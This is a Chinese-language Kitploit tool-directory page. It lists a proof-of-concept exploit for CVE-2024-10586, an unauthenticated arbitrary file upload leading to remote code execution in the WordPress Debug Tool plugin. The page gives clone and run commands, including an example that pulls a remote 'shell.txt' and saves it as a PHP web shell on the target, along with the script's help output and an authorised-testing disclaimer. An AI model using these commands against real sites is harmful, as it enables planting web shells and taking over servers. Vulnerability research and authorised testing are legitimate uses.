Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10586-Poc — 针对WordPress Debug Tool插件的CVE-2024-10586概念验证漏洞利用程序。自动化任意文件上传,通过未认证的POST请求导致远程代码执行。 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-10586-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

针对WordPress Debug Tool插件的CVE-2024-10586概念验证漏洞利用程序。自动化任意文件上传,通过未认证的POST请求导致远程代码执行。

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞信息

描述

WordPress的Debug Tool插件在所有版本直至2.2中存在一个漏洞,由于dbt_pull_image()函数缺少权限检查以及文件类型验证缺失,导致未经身份验证的攻击者可以创建任意文件(如.php文件),进而实现远程代码执行。

CVE ID

CVE-2024-10586

脚本使用方法

先决条件

  • 系统中已安装Python 3.x。
  • 安装所需依赖: pip install requests

运行方式

  1. 从GitHub克隆仓库:
    git clone https://github.com/Nxploited/CVE-2024-10586-Poc
    cd CVE-2024-10586-Poc
    








  

2. 使用以下命令运行脚本:
   python CVE-2024-10586.py -u <WordPress URL> -r <Remote File URL> -p <Optional Shell Path>

   ## 参数
- -u, --url: WordPress站点的基础URL(例如 http://example.com/wordpress)。
- -r, --remote: 用作载荷源的远程文件URL。
- -p, --path: 可选。Shell保存的路径。默认值为/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php。
### 示例命令

python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php




### 示例用法



python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options: -h, --help show this help message and exit -u URL, --url URL The base URL of the WordPress site. -r REMOTE, --remote REMOTE The remote URL to use in the 'source' parameter. -p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

### 免责声明

此脚本仅供教育目的使用。请负责任地使用,仅在你拥有或获得明确测试许可的系统上运行。作者不对任何滥用或由此工具造成的损害负责。
下载工具